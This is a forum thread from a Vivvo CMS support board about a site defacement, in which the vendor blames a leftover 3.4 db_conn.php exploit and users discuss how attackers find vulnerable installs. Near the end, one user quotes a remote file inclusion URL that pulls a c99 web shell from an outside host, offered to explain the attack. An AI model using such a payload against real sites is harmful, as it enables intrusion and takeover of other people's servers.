Hi,

Recently installed 3.5. Had not even finished the design, and have now been hacked by 'HACKED BY ADANALI'.

Trouble is I don't know what files they have interfered with!

Anybody any ideas?

If Vivvo don't get a grip on this they could be losing customers.

This is a bit strange. You upgraded to 3.5, but I'm not sure if you left anything from previous versions, or perhaps some 3.2, or 3.4 files? If you had some backdoor on your server from before, it could have been used, regardless of Vivvo 3.5

Just in case - please send us your HTTP logs for last 7 days, we'd be happy to analyze them, and tell you what exactly was the point of attack. Make sure to use clean 3.5 install and delete all the files prior to that, that way you won't have any "holes" left.

Hi Boccio,

This was a clean install, I had deleted the old 3.4 files.

Sorry, showing my ignorance here, where do I find HTTP logs?

I'm also downloading all the files on the server, so that I can run a file comparison with the originals.

You can find them in your cPanel. If you're unsure about this, please contact us on support HelpDesk ASAP and we'll continue from there.

After reviewing my Google Analytics the other day, I found 5 times that people came to our website using the keywords "Powered by Vivvo.net CMS"

While it is my hope that other Vivvo users are just trying to see other variations of Vivvo in use, but my reality tells me that it is hackers trying to find other sites that use Vivvo software to hack.


Aaron

Yup,

I've just searched Google with 'powered by Vivvo' and, out of the 10-15 sites I looked at, I would say 4 of them have been hacked.

“Powered by” is the standard practice of software vendors, and it is not directly bind to being accessible by hackers. Every software (CMS) has its unique tags, META-s, or code snippets, and can be searched by those phrases the same way it can be by “powered” statement.

On the other hand, quantity of hacked sites is substantially inflated. You have to take into consideration that 90% of those sites are non-licensed (pirated) copies that use old 3.4, or even 3.25 version and typical cracker usually chases everything he can get his hands for. As for our licensed users who regularly apply patches and upgrades, the likelihood of getting hacked is indeed very small and comparable to any similar systems on the market. We constantly work on improving the security of our CMS and cooperate with the members of Vivvo community to identify any potential problems or issues that may arise.

Hi Boccio,

On that note, any news on my hacked problem?

As I had not finished designing the site, will it be OK to re-run the installer?

After examining your logs, we found out that attacker took advantage on old exploit of db_conn.php file (in 3.4), that was most probably left during the upgrade.

Thank you.

Very professional response.

Hi,

i have found how thay work.

thay test how is conection betuen site and database, than have way thay break the browser and thay load shell text from exteren server than thay can load the shell and hack the site.

like that:
/inc/cmses/aedatingCMS.php?dir[inc]=http://tamturk.org/c99.txt? the link is dead now.

http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,TamTurk

the best way for vivvo to be alert is to buld ip block in script ..than you can block the ip`s who tray to hack your site.
make log file for the site 2 that is olso important..

suc6